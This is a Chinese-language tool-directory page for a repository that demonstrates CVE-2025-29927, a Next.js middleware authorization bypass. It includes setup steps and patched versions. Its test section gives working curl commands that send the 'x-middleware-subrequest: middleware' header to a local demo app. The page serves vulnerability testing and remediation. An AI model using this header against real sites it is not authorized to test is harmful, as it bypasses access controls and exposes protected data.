Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
claude-create-CVE-2025-29927 — 测试并演示 CVE-2025-29927,一个 Next.js 中间件授权绕过漏洞。包含利用脚本和正常访问测试脚本,以及修复指导。 | Kitploit
工具/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
漏洞分析Web应用程序漏洞利用Web安全学习与教育
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

测试并演示 CVE-2025-29927,一个 Next.js 中间件授权绕过漏洞。包含利用脚本和正常访问测试脚本,以及修复指导。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
31年前尚未审核
分享

Next.js 中间件漏洞测试工具 (CVE-2025-29927)

此应用程序演示了 Next.js 中间件授权绕过漏洞 (CVE-2025-29927)。

关于该漏洞

CVE-2025-29927 是 Next.js 中间件中的一个授权绕过漏洞。通过发送一个精心构造的 HTTP 头 (x-middleware-subrequest),攻击者可以绕过在中间件中实现的授权检查,从而获得对受保护资源的访问。

设置说明

  1. 安装依赖:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. 启动开发服务器:

    root@kitploit:~
    npm run dev
    
  3. 服务器将在 http://localhost:3000 上启动

测试该漏洞

正常访问(应被阻止)

尝试正常访问受保护的路由:

root@kitploit:~
npm run test-normal

或

root@kitploit:~
curl -v http://localhost:3000/protected-data

您应收到 401 Unauthorized 响应,因为中间件阻止了访问。

利用该漏洞

尝试使用漏洞利用头访问受保护的路由:

root@kitploit:~
npm run test-exploit

或

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

如果应用程序存在漏洞,您将收到 200 OK 响应并返回受保护的数据。

测试 API 路由

正常访问(应被阻止):

root@kitploit:~
curl -v http://localhost:3000/api/protected

使用利用头:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

修复建议

要修复此漏洞,您应:

  1. 将 Next.js 更新到修复版本:

    • Next.js 15.x:更新到 15.2.3 或更高版本
    • Next.js 14.x:更新到 14.2.25 或更高版本
    • Next.js 13.x:更新到 13.5.9 或更高版本
    • Next.js 12.x:更新到 12.3.5 或更高版本
  2. 如果无法更新,请实施反向代理(如 Nginx 或 Cloudflare)以从传入请求中移除 x-middleware-subrequest 头。

附加测试命令

测试 API 路由是否存在漏洞:

root@kitploit:~
# 正常请求(应被阻止)
curl -v http://localhost:3000/api/protected

# 带漏洞利用头
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

免责声明

本工具仅供教育目的和安全测试使用。请使用它来验证您自己的 Next.js 应用程序是否存在漏洞并需要修补。

下载工具